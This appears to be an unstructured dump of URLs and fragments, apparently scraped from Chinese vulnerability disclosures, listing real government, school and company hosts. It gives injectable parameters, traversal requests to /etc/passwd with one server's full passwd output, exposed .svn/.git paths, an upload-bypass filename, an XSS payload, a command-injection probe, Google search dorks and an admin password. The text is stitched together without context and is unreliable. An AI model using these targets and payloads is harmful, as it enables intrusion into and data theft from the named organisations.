http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.workyi.com/ http://www.0745gz.com/ http://180.166.10.92/ http://221.1.104.11:8011/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://221.1.104.11:8011/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://221.2.171.59:8300/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://221.2.171.59:8300/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://demo.inongyou.cn/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://demo.inongyou.cn/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://rctdlz.cn/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://rctdlz.cn/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://60.2.214.118:8088/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://60.2.214.118:8088/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://121.17.2.52/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://121.17.2.52/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://61.186.154.210:8088/OperateCertify/LandChangeAuditShow2Q.aspx?id= http://61.186.154.210:8088/OperateCertify/LandChangeAuditShow1Q.aspx?id= http://mall.iqiyi.com/ www.arts.cuhk.edu.hk/~music/en/people_detail.php?cid=12 http://wenku.baidu.com/view/7aeeb69e195f312b3069a53f.html https://wch.cdpc.chinacdc.cn:8443/FY/login.do http://59.61.215.122:8888/yyoa/index.jsp http://mpa.xmu.edu.cn/App/Frame/index.php/Home/col/colid/16 http://58.56.98.98/search.aspx http://**.**.**/ly/_ http://www.tutuapp.com/photo/.svn/entries http://www.tutuapp.com/images/.svn/entries http://www.tutuapp.com/app/.svn/entries 
http://www.tutuapp.com/js/.svn/entries http://www.tutuapp.com/style/.svn/entries http://www.tutuapp.com/api/.svn/entries http://www.tutuapp.com/validateCode/.svn/entries https://github.com/zhmch/billing/blob/ce5bc9feec6ef84e7c3bef6ee75d44aff1f0527e/src/main/java/com/funguide/billing/Constant.java http://**.**.**/svn/pingan/server/pingan/palottery/ http://**.**.**/svn/pingan/server/pingan/palotsys/ http://**.**.**/svn/E_live/_ huafei.funguide.com.cn/admin_login_ www.funguide.com.cn/LifePaymentMSNew/_ www.funguide.com.cn/violationsdrivecar/_ www.funguide.com.cn:8080/palotsys/_ www.funguide.com.cn/fgpay/admin/login_ http://demo.foosun.net/foosun500/ http://demo.foosun.net/Foosun500/FS/LYB/ http://www.29029.com http://www.29029.com/oa/?lm=19 http://www.29029.com/oa/?lm=19 http://www.29029.com/oa/?m=s1&sql=42&mc=1 http://www.mixiao.com/oa/?lm=3 http://www.bcyxx.com/oa/?lm=3 http://www.cjlxx.com/oa/?lm=49 http://www.bssnzxx.com/oa/?lm=71 http://www.cztsxx.cn/oa/?lm=467 http://www.shgj2x.com/oa/?lm=102 http://www.yzsyxx.net/oa/?lm=101169 http://www.czssx.com/oa/?lm=127 http://byxx.zledu.com/oa/?lm=488 http://www.ks2y.com/cms/JS.aspx?NRID=22&LMID=10 http://www.zjhl.org/cms/JS.aspx?NRID=471&LMID=212 http://www.hnzyy.cn/cms/JS.aspx?NRID=11176&LMID=10 http://www.fysrmyy.com/cms/JS.aspx?NRID=11176&LMID=10 http://www.zjqhyy.com/cms/JS.aspx?NRID=11177&LMID=15 ftp://202.103.209.125 cp.wybu.cn/csy/jl_admin/Admin_List.php?action=add http://t9.go2oa.com/t9/core/frame/webos/index.jsp http://t9.go2oa.com/t9/t9/core/funcs/email/act/T9InnerEMailAct/sendMailAll.act http://www.fanwe.com/dc https://www.shfft.com/proof/view/100000000002/2015031410008798xx.png http://www.zjqhyy.com/cms/GuestBookAdd.aspx?LX=4&LMID=58 http://www.zjhl.org/cms/GuestBookAdd.aspx?LX=3&LMID=58 http://www.zjkq.com.cn/cms/GuestBookAdd.aspx?LX=1&LMID=48 http://www.z2hospital.com/cms/GuestBookAdd.aspx?LX=4&LMID=58 http://www.ks2y.com/cms/GuestBookAdd.aspx?LX=4&LMID=58 
http://www.42trip.com/qa/home.do是个类似知乎那样的专业问答社区加上活动功能,看了下做的还不错,但是这个社区存在大量的 http://222.210.127.204:8081 http://182.140.244.244/是个rhel默认页面,说明没有改配置,那么web目录就在默认的/var/www/html/下面 http://www.wzhospital.com/news.asp?id=2999 http://esci.xmu.edu.cn/news/content.php?web=news&id=93,存在问题的参数为id。 http://221.1.104.11:8011/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://221.1.104.11:8011/OperateCertify/LandCancelAuditShowtown.aspx?id= http://221.2.171.59:8300/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://221.2.171.59:8300/OperateCertify/LandCancelAuditShowtown.aspx?id= http://demo.inongyou.cn/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://demo.inongyou.cn/OperateCertify/LandCancelAuditShowtown.aspx?id= http://rctdlz.cn/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://rctdlz.cn/OperateCertify/LandCancelAuditShowtown.aspx?id= http://60.2.214.118:8088/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://60.2.214.118:8088/OperateCertify/LandCancelAuditShowtown.aspx?id= http://121.17.2.52/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://121.17.2.52/OperateCertify/LandCancelAuditShowtown.aspx?id= http://61.186.154.210:8088/OperateCertify/LandCancelAuditShowtown1.aspx?id= http://61.186.154.210:8088/OperateCertify/LandCancelAuditShowtown.aspx?id= http://www.gztv.com/vod/v99657.shtml http://www.600683.com/hrview1.asp?id=42 http://www.600683.com/test.asp http://www.600683.com/admin/filemanage.asp?id=1&d_viewmode=list&dir=../ http://mobsupport.zte.com.cn/EAGENT/ https://register.nrcc.com.cn/EnterpriseManage/Login.aspx www.mzga.gov.cn:8088/getTopSurvey_survey.action http://58.57.35.3:8091/pic/ http://tv.tcl.com/tvs/checkfrontLogin.do http://tvs/toFronthome.action http://tvs.tcl.com/tvs/redirectfrontLogin.action http://tvs.tcl.com/L.jsp http://www.wscec.com/pages/details.asp?id=178 http://pc.bnu.edu.cn:8080/jspx/main.action http://hotel.elong.com/publishcomment?ordernum=XXXX http://www.smcity.cn/admin/qiaocui.html 
http://igotone.zj.chinamobile.com:81/acwsui/pages/login.htm?sessionId=Gz7DHNhfq9elpk8sOFVNjfY http://www.eastpacific.com.cn/www.rar google:inurl:ReadBigClassmbNews.asp?id= http://www.myyouthbra.com/ReadBigClassmbNews.asp?id=220 http://www.djcfsb.com/readbigclassmbnews.asp?id=225 http://www.lkggcl.com/ReadBigClassmbNews.asp?id=92 http://cp01.cn/ReadBigClassmbNews.asp?id=224 http://www.oywine.com/ReadBigClassmbNews.asp?id=219 http://intheloop.mcdonalds.com.cn/readme.aspx http://intheloop.mcdonalds.com.cn/sendpass.aspx http://122.225.53.6/ http://www.zhuna.cn/so/ajRoom.asp?rid=1 http://www.zhuna.cn/so/ajRoom.asp?rid=1 http://www.zhuna.cn/so/ajRoom.asp?rid=1 http://sz.cqkyaq.com:122/default.asp http://www.ncdlaq.com:188/default.asp http://112.124.10.78:132/default.asp http://42.121.90.111:132/default.asp com:122 http://sz.cqkyaq.com:122 http://icp.gwbnsh.net.cn/images/photo//201503/d05902192dcddfbdd2f8b5d94481cf16.jpg/a.php http://icp.gwbnsh.net.cn/robots.txt/%20\0.php http://icp.gwbnsh.net.cn/robots.txt/a.php http://tp1.znimg.com/v5/images/map/images.php?hid=152589 http://cahkbs.ruc.edu.cn/member/myinfo.jsp?act=edit http://test.cmseasy.cn/celive/include/config.inc.php http://101.95.48.68/home/Default.aspx http://www.jxds.gov.cn/portalV3/site/site/portal/jx/content_index.portal[contentId=268734][categoryId=3999][siteName=jx][categoryCode=001027001006002 http://baike.1688.com/doc/view-d22569261.html http://www.nacao.org.cn/ http://www.yodo1.com.cn/ http://www.yodo1.cn http://yodo1.cn/wp-content/plugins/hello.php http://yodo1.cn/.git/config http://222.82.232.181:88/more.php?ks=1&lm=2 http://221.232.136.62/pm/ http://www.nhfpc.gov.cn/ inurl:ReadArticlemb.asp?id= inurl:ReadBigClassmb.asp?id= inurl:ReadBigClassmbNews.asp?id= http://expteach.gzhu.edu.cn/OpenTimsUI/STUMODEL/StuBookExpCell.aspx?codeID=9231&syxs=3&SYMC=%b5%e7%d7%d3%ba%c9%d6%ca%b1%c8%b5%c4%b2%e2%b6%a8&xn=2015&xq=1 http://www.zzyedu.org/Template/kclass.asp?Class1ID=22&page=2 http://www.jxzx.com.cn/ 
http://**.**.**/console http://**.**.**/console/ http://**.**.**/console/ http://**.**.**/console/ http://**.**.**/console/ http://**.**.**/console/新乡市公安消防支队_ http://**.**.**/console吉林消防办事直通车_ http://**.**.**/console辽宁总队办事直通车_ http://**.**.**/console三明市消防服务大厅_ http://**.**.**/console/ http://**.**.**/console福建省公安厅消防服务大厅_ http://www.ek21.com http://www.robam.com/minisitea7/newsinfo.php?news_id=1113 http://stats.spb.gov.cn/ http://stats.spb.gov.cn http://my.zol.com.cn/app/app.php?aid=6&userid=Pledger&c=book&m=my&url=%00../../../../../../../../etc/passwd http://www.cdtlgcxx.com:2110 http://jwmis.dzvtc.edu.cn http://jwgl.lynu.edu.cn http://220.167.53.63:81 http://jw.sxjgxy.edu.cn http://djyjw.sicau.edu.cn http://jys.zjedu.org/admin/admin.aspx https://vendor.wanda.cn/ https://vendor.wanda.cn/tender/trace.axd https://vendor.wanda.cn/tender/ http://app.clubwanda.com.cn/wanda/ http://221.1.104.11:8011/OperateCertify/LandChangeAuditShow1.aspx?id= http://221.1.104.11:8011/OperateCertify/LandChangeAuditShow.aspx?id= http://221.2.171.59:8300/OperateCertify/LandChangeAuditShow1.aspx?id= http://221.2.171.59:8300/OperateCertify/LandChangeAuditShow.aspx?id= http://demo.inongyou.cn/OperateCertify/LandChangeAuditShow1.aspx?id= http://demo.inongyou.cn/OperateCertify/LandChangeAuditShow.aspx?id= http://rctdlz.cn/OperateCertify/LandChangeAuditShow1.aspx?id= http://rctdlz.cn/OperateCertify/LandChangeAuditShow.aspx?id= http://60.2.214.118:8088/OperateCertify/LandChangeAuditShow1.aspx?id= http://60.2.214.118:8088/OperateCertify/LandChangeAuditShow.aspx?id= http://121.17.2.52/OperateCertify/LandChangeAuditShow1.aspx?id= http://121.17.2.52/OperateCertify/LandChangeAuditShow.aspx?id= http://61.186.154.210:8088/OperateCertify/LandChangeAuditShow1.aspx?id= http://61.186.154.210:8088/OperateCertify/LandChangeAuditShow.aspx?id= http://gh.cdyee.com/admin.php http://www.jsxz.lss.gov.cn/admin http://www.bjsasc.com//usermanage/register/index.asp 
http://221.1.104.11:8011/OperateCertify/LandChangeAuditShowtown.aspx?id= http://221.2.171.59:8300/OperateCertify/LandChangeAuditShowtown.aspx?id= http://demo.inongyou.cn/OperateCertify/LandChangeAuditShowtown.aspx?id= http://rctdlz.cn/OperateCertify/LandChangeAuditShowtown.aspx?id= http://60.2.214.118:8088/OperateCertify/LandChangeAuditShowtown.aspx?id= http://121.17.2.52/OperateCertify/LandChangeAuditShowtown.aspx?id= http://61.186.154.210:8088/OperateCertify/LandChangeAuditShowtown.aspx?id= http://www.gdsto.com.cn/admin/eWebEditor/db/ewebeditor.mdb http://www.gdsto.com.cn/admin/eWebEditor/admin_login.asp http://www.gjb.com.cn/actionServer.php?action=downfile&fname=../index.php&ei=3kQGVe6qC4WAzAPZwYG4CQ&usg=AFQjCNH2QPP-ZmMTHmJtWQtCXVUyViUNAQ&bvm=bv.88198703,d.bGQ&cad=rjt http://www.cape.com.cn/ecshop/admin/index.php http://www.cape.com.cn/capemanage/index.php http://cata.cape.com.cn/dede/login.php http://zbbz.cape.com.cn:8080/ http://219.232.237.69/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://219.232.237.69/resin-doc/viewfile/?contextpath=/&servletpath=&file=/WEB-INF/web.xml http://www.nits.org.cn/getIndex.req?action=quary&req=modulenvpromote&id=1218&type=0&moduleId=467&sid=35 www.magtech.com.cn http://118.145.16.212/Jwk_ghyyj/CN/volumn/home.shtml http://118.145.16.212/journalx_ghyyj/secure/admin/fckeditor/editor/filemanager/upload/simpleuploader?Type=File http://worldcup.suning.com/WorldCupGameService/gotoWorldCup.action http://cms.joy.cn/.svn/entries https://github.com/liuxiong332/node-viewpoint/blob/44221afc87be200220d66e1fa86f938004769d8d/lib/node-viewpoint.coffee url:http://star.koowo.com/star/userlist.txt http://t.cn/RwkB0Dz http://fx.fj.189.cn/.svn/entries http://www.ltpower.net/ inurl:Content.Asp inurl:showinfo http://222.184.102.170/ news.07073.com/plus/digg_ajax9.php?type=&id=1071264 http://xssec.cc/VdeTjC?1426492666 http://kf.sdo.com/kf/zz.aspx?url=zz.aspx(战争世界): http://kf.sdo.com/kf/News.aspx: 
http://kf.sdo.com/kf/aion.aspx?url=aion.aspx(永恒之塔): http://kf.sdo.com/kf/lzg.aspx?url=lzg.aspx(龙之谷): http://kf.sdo.com/kf/mir2.aspx?url=mir2.aspx(热血传奇): http://222.52.151.121:8081/login.asp http://61.235.191.149:8081/login.asp http://221.176.225.174:8081/login.asp http://120.194.234.212:8081/login.asp http://120.209.10.202:8081/login.asp http://www.ltpower.net/ inurl:Content.Asp inurl:showinfo http://jpkc.fimmu.com/sqhl/search.asp?pageno=3&keywords=1 http://jpkc.zzti.edu.cn/C202/search.asp?pageno=3&keywords=1 http://www.gzvtc.cn/%E7%9F%B3%E5%8C%96%E5%B7%A5%E7%A8%8B%E7%B3%BB/search.asp?pageno=3&keywords=1 http://ghmicr.jnu.edu.cn/search.asp?pageno=3&keywords=1 http://www.zjyy.com.cn/zyk/search.asp?pageno=3&keywords=1 http://webimg.br.baidu.com/odin/201410/5a0df6833f6bddadbf651e465e681f68.jpg转发了出来。形成了ssrf http://wap.ftchinese.com/.svn/entries http://wap.ftchinese.com/FTC_MBA.zip inurl://///?/tudou./@password http://www.beequick.cn/登录,提供手机验证。可查询订单信息等。 www.beequick.cn http://shop.zhe800.com/users/addresses http://www.cba.gov.cn/cbastats/teamdetail.aspx?id=Te010 http://www.yiban.cn/project/wangluowenhua/sort-culture.php?cateid=3&search_name=1357919988 http://58.68.252.68:9000/ http://117.40.138.30:9000/ http://116.1.249.151:9000/ http://222.223.141.16:9000/ http://218.24.171.28:9000/ http://61.184.36.220:9000/ http://117.40.138.30:9000/ user:admin password:adminadmin@@ http://kdjyxk.spb.gov.cn/admin/system/getPass.jsp inurl:until/select_sbbh.jsp inurl:subject_info.jsp?up_lmbh http://zsb.nwpu.edu.cn/phpmyadmin/ http://www.eyw.edu.cn/www/tjpumba/listnews.php?typeid=18 http://wu.scbb.pkusz.edu.cn/wdsp/getResults?id=4224 http://shouji.baidu.com/soft/item?docid=7550690&from=web_alad_6 http://116.213.222.114/ http://116.213.222.114/javascript/uploadify-v2.1.4/uploadify.php http://dd.xdcms.cn/index.php?m=member&f=edit http://www.51openos.com/ http://www.1ypg.com/ inurl:help/genuinetwo.html http://**.**.**/_ http://**.**.** http://**.**.**/_ http://**.**.**/_ http://**.**.** 
http://**.**.**/ http://manyou.189.cn/ http://manyou.189.cn/1123123.jsp https://221.13.108.150/ www.hhws.gov.cn/upload_load/info_download.jsp?down_URL=/upload_load/info_download.jsp http://bizhi.360.cn/showWallPaper.html?kw=%810%C90%810%9C2&imgurl=%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C%3CScript%3Ealert%28%22by:0x%2080%22%29%3C/script%3E%3C inurl:openwebmail下,大概有好几十页都是该邮箱系统的登录页面,如: http://hlc.edu.tw/cgi-bin/owmmdirdb/openwebmail.pl http://tea.ntue.edu.tw/cgi-bin/owmmdir/openwebmail.pl http://mail.meiho.edu.tw/cgi-bin/owmmdir2/openwebmail.pl http://webmail.tatung.com/cgi-bin/owmmdir2/openwebmail.pl http://gautai.com.tw/cgi-bin/openwebmail/openwebmail.pl http://ms2.kntech.com.tw/cgi-bin/openwebmail/openwebmail.pl http://ftkr.com.tw/ http://mail.tajen.edu.tw/cgi-bin/openwebmail/openwebmail.pl http://ee.ncku.edu.tw/cgi-bin/owmmdir/openwebmail.pl http://mail.tccn.edu.tw/cgi-bin/openwebmail/openwebmail.pl intitle:ZDSOFT.NET信息发布平台 www.lzedu.cn:8080/cnet/system/login.jsp www.lzedu.cn:8080 inurl:csccmise http://www.bluedragon.com.cn/csccmise/cczp.asp?xhid=33208 http://www.cclcfs.com:81/csccmise/cczp.asp?xhid=33208 http://122.227.235.122/csccmise/cczp.asp?xhid=33208 http://nbrywl.com/csccmise/cczp.asp?xhid=33208 http://61.175.235.81:88/csccmise/cczp.asp?xhid=33208 http://60.190.16.166/csccmise/cczp.asp?xhid=33208 http://www.nhcc-cn.com/csccmise/cczp.asp?xhid=33208 http://www.bluedragon.com.cn/csccmise/cczp.asp?xhid=33208为例: http://59.61.82.170/webmt/SysLogin.aspx https://219.143.245.230 https://219.143.245.230/console/ http://apil.ruc.edu.cn/manage/Login.asp http://nc.youku.com/index_QSideToolJSONP?function[]=getUserInfo&callback[]=SideTool.showUserMsgCallback http://nc.youku.com/index_QSideToolJSONP?function[]=getUserBasicInfo&callback[]=SideTool.upUserImg http://nc.youku.com/index_QSideToolJSONP?function[]=viewRecord&callback[]=SideTool.showRecordListCallback http://nc.youku.com/index_QSideToolJSONP?function[]=getNoticeInfo&callback[]=SideTool.showNoticeListCallback 
www.eyougame.com http://msf.cq119.gov.cn:8083/cqcms/index.jsp http://113.108.129.142/dlarea/download.php?fn=../../../../../../../../../../etc/passwd&bid=74&bname=%E5%BA%B7%E4%BD%B3&mid=1633&mname=D580 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin 
samba:x:500:500::/home/samba:/bin/bash zhanghs:x:501:501::/home/zhanghs:/bin/bash baixf:x:502:502::/home/baixf:/bin/bash splunk:x:503:503:Splunk Server:/opt/splunkforwarder:/bin/bash esets:x:101:104::/home/esets:/bin/false monitor:x:504:504::/home/monitor:/bin/bash http://www.yiban.cn/admin/index/login http://www.pgyer.com http://www.pgyer.com/app/add http://www.pgyer.com/B9v6 http://m.tuan.duba.com/ http://114.112.68.203/ http://tuan.duba.com http://114.112.68.203/?city=1 http://114.112.68.203/?city=1 http://cache.baiducontent.com/c?m=9d78d513d98207fc18fa950e1a16a0711824d93e61928d027ea48448e4735a31163bbcac2753514280856b6770e8080baaae6d33711421c78cc8ff5ddccbd462699c60742e13dc0754910eaeb85b388066c31afeaf6ebee7ad77ceb9d2a48e090cd7124329c0edcc1b57549434b15226e3d1df0253&p=882a9544dc8502fe12aec7710f5d8c&newp=c357c216d9c111a058ec9e2b614c9f231610db2151ddd615&user=baidu&fm=sc&query=http%3A//star%2Ekoowo%2Ecom/star/userlist%2Etxt&qid=b6347d18000072f5&p1=1 http://bbs.yjbys.com/bbs.rar http://www.china-safety.org/china-safety.org.zip http://218.94.128.133/zl/ www.sxycga.com/_ www.sxycg***** http://www.hvtol.com/Product/ http://www.hvtol.com/success/ http://www.gmshouji.com/User/User_ShopUserOrder.asp?Action=Edit&id=1 http://www.sdyoulaile.com/User/User_ShopUserOrder.asp?Action=Edit&id=2 http://222.172.223.253:8080/Manager/Login.aspx http://qhdm.asmz.gov.cn/NEWS/newshow.aspx?id=547 http://xgfx.hb.189.cn/?admin/ http://221.1.104.11:8011/OperateCertify/LandCancelAuditShowtownQ.aspx?id= http://221.1.104.11:8011/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://221.2.171.59:8300/OperateCertify/LandCancelAuditShowtownQ.aspx?id= http://221.2.171.59:8300/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://demo.inongyou.cn/OperateCertify/LandCancelAuditShowtownQ.aspx?id= http://demo.inongyou.cn/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://rctdlz.cn/OperateCertify/LandCancelAuditShowtownQ.aspx?id= 
http://rctdlz.cn/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://60.2.214.118:8088/OperateCertify/LandCancelAuditShowtownQ.aspx?id= http://60.2.214.118:8088/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://121.17.2.52/OperateCertify/LandCancelAuditShowtownQ.aspx?id= http://121.17.2.52/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://61.186.154.210:8088/OperateCertify/LandCancelAuditShowtownQ.aspx?id= http://61.186.154.210:8088/OperateCertify/LandCancelAuditShowtown1print.aspx?id= http://donghua.u17.com/ http://www.mojing8.com/compare.aspx?ids=0 http://www.shop0516.com/compare.aspx?ids=0 http://www.echinasport.com/compare.aspx?ids=0 http://www.superlover.cn/compare.aspx?ids=0 http://www.guanshitong.com/compare.aspx?ids=0 http://www.subilong.com/compare.aspx?ids=0 http://www.cs929.com/compare.aspx?ids=0 http://www.greeni.cn/compare.aspx?ids=0 http://www.glorybooks.com.cn/compare.aspx?ids=0 http://shop.cacs.net.cn/compare.aspx?ids=0 http://ggzy.jzcfxxw.gov.cn:8080/news/notice/one/index.jspx?id=20075 http://116.11.253.53/admin/mainFrame.aspx http://www.ztesoft.com/index.php?ac=form&fgid=1&at=list http://www.hnrbi.com/kcsjy/index.jsp http://www.hnrbi.com/kcsjy/cms/website/04/template_div/subcollist.jsp?oldcid=3356 http://www.haidao.la/ http://demo.haidao.la/index.php inurl:rapid.jsp?websiteid http://www.zygs.com/zygs/cms/index/template/rapid.jsp?websiteid=797&searchType=f_subject&columnids=-1&searchStr=a http://www.hnrbi.com/kcsjy/cms/index/template/rapid.jsp?nextPage=20&websiteid=737&searchType=F_SUBJECT&searchStr=&beginDate=null&endDate=null&columnids=3505,3517,3475,3406,3355,3370,3365,3356,3375,3518,3506,3373,3425,3407,3376,3364,3377,3395,3362,3507,3358,3367,3519,3369,3408,3372,3508,3374,3371,3368,3363,3520,3485,3409,3379,3378,3426,3380,3509,3410,3510,3385,3465,3411,3511,3405,3415,3512,3416,3513,3514,3445,3515,3495,3516,3521 
http://www.yrihr.com.cn/hky/cms/index/template/rapid.jsp?websiteid=32&searchType=f_subject&columnids=-1&searchStr= http://www.hngsdc.com/hngsdc/cms/index/template/rapid.jsp?nextPage=19&websiteid=717&searchType=f_subject&searchStr=&beginDate=null&endDate=null&columnids=4256,4268,3247,4278,3245,3298,4283,4385,3299,3296,3246,3502,4279,4386,4269,4267,4285,4280,3504,3248,4276,4265,4281,4255,4395,4335,3500,4272,4246,4282,3385,4315,4325,4345,4355,4365,4375 http://www.ayx.gov.cn/ayx/cms/website/ayx/index/rapid.jsp?websiteid=82&searchType=f_subject&columnids=-1&searchStr=a&selectwzid=0 http://61.163.228.163/kcsjy/cms/index/template/rapid.jsp?nextPage=20&websiteid=737&searchType=F_SUBJECT&searchStr=a&beginDate=null&endDate=null&columnids=3505,3517,3475,3406,3355,3370,3365,3356,3375,3518,3506,3373,3425,3407,3376,3364,3377,3395,3362,3507,3358,3367,3519,3369,3408,3372,3508,3374,3371,3368,3363,3520,3485,3409,3379,3378,3426,3380,3509,3410,3510,3385,3465,3411,3511,3405,3415,3512,3416,3513,3514,3445,3515,3495,3516,3521 http://218.28.41.15/hky/cms/index/template/rapid.jsp?nextPage=6&websiteid=32&searchType=f_subject&searchStr=&beginDate=null&endDate=null&columnids=87,1233,1193,1272,1200,1203,1230,62,78,60,1211,44,1224,1227,1221,67,11,1217,48,54,57,81,63,61,58,21,88,82,79,68,55,45,1234,73,1231,1228,1225,1222,1218,1212,1204,1194,1213,80,1229,89,1220,46,1223,83,1235,1232,59,1205,56,64,69,1195,1226,22,47,84,65,70,90,1196,1206,1214,1274,85,1197,1215,66,1207,24,71,1198,86,1216,72,1208,25,1199,1209,26,74,27,75,28,1201,76,29,30,77,31,33,34,35,36,37,38,39,40,41,42,43,91,1192,1202,1210,1252,1262,1282,1292 http://hngsdc.com/hngsdc/cms/index/template/rapid.jsp?nextPage=12&websiteid=717&searchType=f_subject&searchStr=&beginDate=null&endDate=null&columnids=4256,4268,3247,4278,3245,3298,4283,4385,3299,3296,3246,3502,4279,4386,4269,4267,4285,4280,3504,3248,4276,4265,4281,4255,4395,4335,3500,4272,4246,4282,3385,4315,4325,4345,4355,4365,4375 
http://218.29.75.230/hngsdc/cms/index/template/rapid.jsp?websiteid=717&nextPage=22&searchType=f_subject&searchStr=&beginDate=null&endDate=null&columnids=4256,4268,3247,4278,3245,3298,4283,4385,3299,3296,3246,3502,4279,4386,4269,4267,4285,4280,3504,3248,4276,4265,4281,4255,4395,4335,3500,4272,4246,4282,3385,4315,4325,4345,4355,4365,4375 http://appweb.yaya888.com/activity.php?aid=38 http://www.ljggzy.gov.cn/home/news/detail.asp?subjectid=002009005&id=189 http://wsbs.gzagri.gov.cn/xzsp/index/findOneMessage.do?mid=230 http://114.251.243.19/ http://114.251.243.19/UploadFile/GuestPhoto/20150317110716aspx.aspx http://suggestion.baidu.com/su;/1.bat;?wd=&cb=calc||&sid=1440_2031_1945_1788&t=1362056239875 http://www.xxt.cn//xmlrpc http://file.sywg.com:8888/ http://demo.dbshop.net/ http://yifushoes.com http://www.asnei.com http://55techan.cn http://woyyg.com http://dg.dan2dan.ne0 http://shengqianqu.com/ https://www.yiji.com/yjf/common/backpwd.htm) http://www.lzsnyj.gov.cn http://www.lzsnyj.gov.cn/TXT_Detail.asp?sAction=%D5%FE%B9%A4%D4%B0%B5%D8&ID=468 http://mhz.pw/game/discuz/xss.php?domain=bbs.games.sina.com.cn http://www.buaapress.com.cn/bookshop.php?booktypeid=53&pmenuid=2 http://www.buaapress.com.cn/admin/index.php ftp://202.99.109.158 http://www.worldeyes.net/ http://ggzy.llcftxw.gov.cn/news/notice/one/index.jspx?id=3734 http://tool.link3c.com http://tool.link3c.com/ http://www.worldeyes.net/ http://www.worldeyes.net/ http://**.**.**/hrmgrsys/hrAction!login.action_ www.ngga.gov.cn:8080/hrmgrsys/test.txt_ http://icc.hnair.com/ http://icc.hnair.com/5107/upload/screenImagesSave.php?filename=wooyun.php.a;.7z http://icc.hnair.com/data/files/20150317/wooyun.php.a;.7z URL:http://www.scti.cn/test/showmessageinfo.aspx?id=906 http://www.scti.cn/test/productdetailinfo.aspx?id=17(参数id) http://www.scti.cn/test/listinfo.aspx?sourse=1&type=3(参数type) http://221.204.249.120:8080/sx_jtzjj_oa/syslogin.action http://221.204.249.120:8080/sx_jtzjj_oa/test.txt http://www.ot-hs.com/index1.asp 
